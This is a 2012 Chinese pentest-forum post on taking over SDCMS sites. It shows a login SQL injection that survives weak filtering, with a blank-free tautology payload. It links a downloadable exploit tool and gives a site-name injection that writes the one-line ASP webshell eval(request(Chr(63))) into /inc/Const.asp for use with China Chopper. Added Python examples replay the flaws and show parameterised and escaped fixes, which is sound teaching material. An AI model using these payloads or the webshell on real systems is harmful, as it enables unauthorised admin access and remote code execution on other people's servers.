中国网络渗透测试联盟
Title: SDCMS universal vulnerability exploit tool and privilege escalation to get a shell
Author: admin
Posted: 2012-11-9 20:57
Original author: T00LS 鬼哥
Vulnerable file: <backend directory>/index.asp

Sub Check
    Dim username,password,code,getcode,Rs
    ' Reject requests submitted from an external Referer
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    ' Both fields go through FilterText in mode 1 (see the function below)
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    ' Daily limit on failed logins
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    ' CAPTCHA must be present, numeric and equal to the session value
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        ' username is concatenated straight into the SQL text; only the password is hashed
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            ' Login state is kept in cookies, including the stored password hash Rs(2)
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            ' Automatically delete log records older than 30 days (Access or MSSQL syntax)
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
We can see that username is filtered through FilterText. Let's look at the code of FilterText:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            ' Mode 1: only blanks and line breaks are removed
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            ' Mode 2: control characters and most ASCII punctuation are removed
            t0=Replace(t0,Chr(8),"")'backspace
            t0=Replace(t0,Chr(9),"")'tab (horizontal)
            t0=Replace(t0,Chr(10),"")'line feed
            t0=Replace(t0,Chr(11),"")'vertical tab
            t0=Replace(t0,Chr(12),"")'form feed
            t0=Replace(t0,Chr(13),"")'carriage return (chr(13)&chr(10) is the CR+LF pair)
            t0=Replace(t0,Chr(22),"")'SYN control character
            t0=Replace(t0,Chr(32),"")'space
            t0=Replace(t0,Chr(33),"")'!
            t0=Replace(t0,Chr(34),"")'"
            t0=Replace(t0,Chr(35),"")'#
            t0=Replace(t0,Chr(36),"")'$
            t0=Replace(t0,Chr(37),"")'%
            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
            t0=Replace(t0,Chr(40),"")'(
            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
            t0=Replace(t0,Chr(43),"")'+
            t0=Replace(t0,Chr(44),"")',
            t0=Replace(t0,Chr(45),"")'-
            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
            t0=Replace(t0,Chr(58),"")':
            t0=Replace(t0,Chr(59),"")';
            t0=Replace(t0,Chr(60),"")'<
            t0=Replace(t0,Chr(61),"")'=
            t0=Replace(t0,Chr(62),"")'>
            t0=Replace(t0,Chr(63),"")'?
            t0=Replace(t0,Chr(64),"")'@
            t0=Replace(t0,Chr(91),"")'[ (the original comment said \, but Chr(91) is [)
            t0=Replace(t0,Chr(92),"")'\
            t0=Replace(t0,Chr(93),"")']
            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
            t0=Replace(t0,Chr(123),"")'{
            t0=Replace(t0,Chr(124),"")'|
            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
        Case Else
            ' Default mode: HTML-encode. The forum rendering had decoded the entity
            ' names to bare characters (which would make these calls no-ops); they
            ' are restored here, with &#39; for the apostrophe assumed.
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        ' Inserts a soft hyphen (U+00AD) between "e" and "x" to defuse CSS expression()
        t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
See? With parameter 1 it only filters these four things:

t0=Replace(t0,Chr(32),"")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"")
t0=Replace(t0,Chr(10),"")

Blanks, CR and LF are removed; the single quote is not, and username is concatenated straight into the Select on Sd_Admin, so the login query is SQL-injectable (the payload simply has to contain no blanks). This vulnerability lets you obtain the backend account and password directly: once the query matches a row, Check copies the stored password hash Rs(2) into the sdcms_pwd cookie and sends you to the backend. The SDCMS default backend path is /admin/; if the webmaster changed the backend path, find it yourself!
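The injection described above, replayed as an added example (this is not SDCMS code and not the post's tool). It ports FilterText mode 1 to Python, builds the Sd_Admin query exactly as index.asp concatenates it, runs it against a constructed in-memory SQLite table, and then runs the same query with bound parameters. The tautology payload, the sample admin row and the column layout are constructed for illustration; the only thing taken from the page is the filter and the query text.

```python
"""Added example, not SDCMS code: replays the index.asp login query against an
in-memory SQLite copy of Sd_Admin (constructed sample data) to show what
FilterText mode 1 lets through and how bound parameters close the hole."""
import hashlib
import sqlite3

SELECT_COLUMNS = "Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever"


def filter_text_mode1(t0: str) -> str:
    """Port of FilterText(t0, 1): Trim, then drop blanks, CR and LF. Nothing else."""
    t0 = t0.strip()
    for ch in (" ", "\r", "\n\n", "\n"):
        t0 = t0.replace(ch, "")
    return t0


def md5(s: str) -> str:
    """Stand-in for the md5() helper applied to the password."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed Sd_Admin table with one admin row (the real schema has more columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Sd_Admin (Id INTEGER, Sdcms_Name TEXT, Sdcms_Pwd TEXT, "
        "isadmin INTEGER, alllever TEXT, infolever TEXT)"
    )
    conn.execute(
        "INSERT INTO Sd_Admin VALUES (1, 'admin', ?, 1, '1', '1')",
        (md5("not-the-real-password"),),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Mirrors Check(): filter, then concatenate into the SQL text as index.asp does.
    Returns the matched row (what Rs holds) or None (Rs.Eof)."""
    username = filter_text_mode1(username)
    password = filter_text_mode1(password)
    sql = ("SELECT " + SELECT_COLUMNS + " FROM Sd_Admin WHERE Sdcms_Name='"
           + username + "' AND Sdcms_Pwd='" + md5(password) + "'")
    return conn.execute(sql).fetchone()


def login_fixed(conn, username: str, password: str):
    """Same query with bound parameters: a quote in username is data, not SQL syntax."""
    username = filter_text_mode1(username)
    password = filter_text_mode1(password)
    sql = "SELECT " + SELECT_COLUMNS + " FROM Sd_Admin WHERE Sdcms_Name=? AND Sdcms_Pwd=?"
    return conn.execute(sql, (username, md5(password))).fetchone()


def cookies_after_login(row, submitted_username: str) -> dict:
    """The Add_Cookies calls in Check(): note the stored hash Rs(2) is sent to the client."""
    return {"sdcms_id": row[0], "sdcms_name": submitted_username, "sdcms_pwd": row[2],
            "sdcms_admin": row[3], "sdcms_alllever": row[4], "sdcms_infolever": row[5]}


# Constructed tautology for illustration. It contains no blank on purpose: mode 1
# strips Chr(32), so a spaced payload such as "' or '1'='1" would be mangled.
PAYLOAD = "'or'1'='1'or'1'='1"

if __name__ == "__main__":
    db = make_db()
    row = login_vulnerable(db, PAYLOAD, "anything")
    print("vulnerable:", cookies_after_login(row, PAYLOAD) if row else None)
    print("fixed     :", login_fixed(db, PAYLOAD, "anything"))
```

The vulnerable path returns the admin row for the payload, and the cookie dictionary shows the password hash leaving the server; the parameterised path returns None for the same input and only succeeds with the real credentials.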
EXP exploit tool download (this tool only runs on XP): sdcms-EXP
Test:

Now enter the CAPTCHA shown in the tool, then click OK.

See, we went straight into the backend admin panel, heh!

Straight into the backend, just like that....
SDCMS privilege escalation:

Method 1: open /<backend directory>/sdcms_set.asp and append ":eval(request(Chr(63)))' to the 网站名称 (site name) field, so the value becomes <site name>":eval(request(Chr(63)))'. That is enough to write a one-line webshell straight into /inc/Const.asp: the leading " closes the ASP string literal the setting is stored in, : starts a new statement, eval(request(Chr(63))) executes whatever is sent in the request parameter named Chr(63), i.e. ?, and the trailing ' comments out the rest of the line. The one-liner's connection password is ?
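Why the site-name trick works, as an added example (not SDCMS code): the value is written verbatim into an ASP include, so the characters " : ' change the line's meaning. The post does not show the line format sdcms_set.asp writes into /inc/Const.asp, so the format Const SiteName="..." used here is an assumption, as is the small VBScript line reader; the payload string is the one from the post with straight quotes.

```python
"""Added example, not SDCMS code: models how a setting written verbatim into an
ASP include becomes executable code, and how escaping for a VBScript string
literal stops it. The Const SiteName="..." line format is an assumption."""

# The payload from the post, with straight quotes. Chr(63) is "?", which is why
# the resulting one-liner's connection password is "?".
ASP_PAYLOAD = '":eval(request(Chr(63)))\''


def write_const_line_vulnerable(site_name: str) -> str:
    """Assumed behaviour of the setting writer: value dropped between quotes, unescaped."""
    return 'Const SiteName="' + site_name + '"'


def write_const_line_fixed(site_name: str) -> str:
    """Escape for a VBScript string literal: double every quote, and refuse line
    breaks, which cannot appear inside a literal and would break the include."""
    if "\r" in site_name or "\n" in site_name:
        raise ValueError("line breaks are not allowed in a setting value")
    return 'Const SiteName="' + site_name.replace('"', '""') + '"'


def asp_statements(line: str) -> list:
    """Minimal VBScript line reader: splits on ':' outside string literals, treats a
    doubled quote inside a literal as one quote character, and stops at a ' comment.
    Returns the statements the interpreter would see on this line."""
    stmts, cur, in_str, i = [], [], False, 0
    while i < len(line):
        c = line[i]
        if in_str:
            cur.append(c)
            if c == '"':
                if i + 1 < len(line) and line[i + 1] == '"':
                    cur.append('"')      # "" inside a literal is an escaped quote
                    i += 1
                else:
                    in_str = False       # literal closed
        elif c == '"':
            in_str = True
            cur.append(c)
        elif c == ":":
            stmts.append("".join(cur).strip())   # statement separator
            cur = []
        elif c == "'":
            break                                 # comment: rest of line ignored
        else:
            cur.append(c)
        i += 1
    tail = "".join(cur).strip()
    if tail:
        stmts.append(tail)
    return stmts


if __name__ == "__main__":
    tainted = "MySite" + ASP_PAYLOAD
    # Unescaped: two statements, the second being the attacker's eval(...)
    print(asp_statements(write_const_line_vulnerable(tainted)))
    # Escaped: a single Const statement whose value merely contains the payload text
    print(asp_statements(write_const_line_fixed(tainted)))
```

The reader is only as strict as it needs to be for this case; the point is that the unescaped writer yields a second statement, eval(request(Chr(63))), while doubling quotes keeps the whole tainted value inside one literal. Rejecting CR/LF matters too: a line break inside the literal would not give code execution after escaping, but it would leave Const.asp unparsable and take the site down.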
OK, now connect with 菜刀 (China Chopper)!